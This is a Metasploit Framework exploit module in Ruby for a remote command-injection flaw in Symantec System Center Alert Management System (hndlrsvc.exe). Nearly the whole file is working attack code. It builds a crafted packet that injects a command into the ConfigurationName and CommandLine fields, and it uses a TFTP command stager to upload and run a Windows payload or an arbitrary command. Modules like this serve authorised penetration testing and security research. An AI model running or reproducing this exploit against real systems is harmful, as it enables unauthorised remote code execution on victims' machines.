## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution', 'Description' => %q{ Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '66807'], [ 'BID', '41959' ], [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ], ], 'Targets' => [ [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => true, 'Platform' => 'win', 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 26 2010')) register_options( [ Opt::RPORT(38292), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]), ], self.class) end def windows_stager exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.'}) @payload_exe = payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) end def execute_command(cmd, opts = {}) connect if ( cmd.length > 128 ) fail_with(Exploit::Failure::Unknown, "Command strings greater then 128 characters will not be processed!") end string_uno = Rex::Text.rand_text_alpha_upper(11) string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5) packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" packet << "\xe8\x03\x00\x00" packet << 'PRGXCNFG' packet << "\x10\x00\x00\x00" packet << "\x00\x00\x00\x00\x04" packet << 'ALHD\F' packet << "\x00\x00\x01\x00\x00" packet << "\x00\x01\x00\x0e\x00" packet << 'Risk Repaired' packet << "\x00\x25\x00" packet << 'Symantec Antivirus Corporate Edition' packet << "\x00\xf9\x1d\x13\x4a\x3f" packet << [string_uno.length + 1].pack('v') + string_uno packet << "\x00\x08\x08\x0a" packet << "\x00" + 'Risk Name' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x0a\x00" packet << 'File Path' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x11\x00" packet << 'Requested Action' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x0e\x00" packet << 'Actual Action' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x07\x00" packet << 'Logger' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x05\x00" packet << 'User' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x09\x00" packet << 'Hostname' packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno packet << "\x00\x08\x13\x00" packet << 'Corrective Actions' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x00\x07\x08\x12\x00" packet << 'ConfigurationName' packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') packet << "\x00" + cmd packet << "\x00\x08\x0c\x00" packet << 'CommandLine' packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') packet << "\x00" + cmd packet << "\x00\x08\x08\x00" packet << 'RunArgs' packet << "\x00\x04\x00\x02\x00" packet << "\x20\x00\x03\x05\x00" packet << 'Mode' packet << "\x00\x04\x00\x02\x00\x00\x00" packet << "\x0a\x0d\x00" packet << 'FormatString' packet << "\x00\x02\x00\x00\x00\x08\x12\x00" packet << 'ConfigurationName' packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" packet << 'HandlerHost' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00" * packet.length sock.put(packet) select(nil,nil,nil,3) disconnect end def exploit if not datastore['CMD'].empty? print_status("Executing command '#{datastore['CMD']}'") execute_command(datastore['CMD']) return end case target['Platform'] when 'win' windows_stager else fail_with(Exploit::Failure::Unknown, 'Target not supported.') end handler end end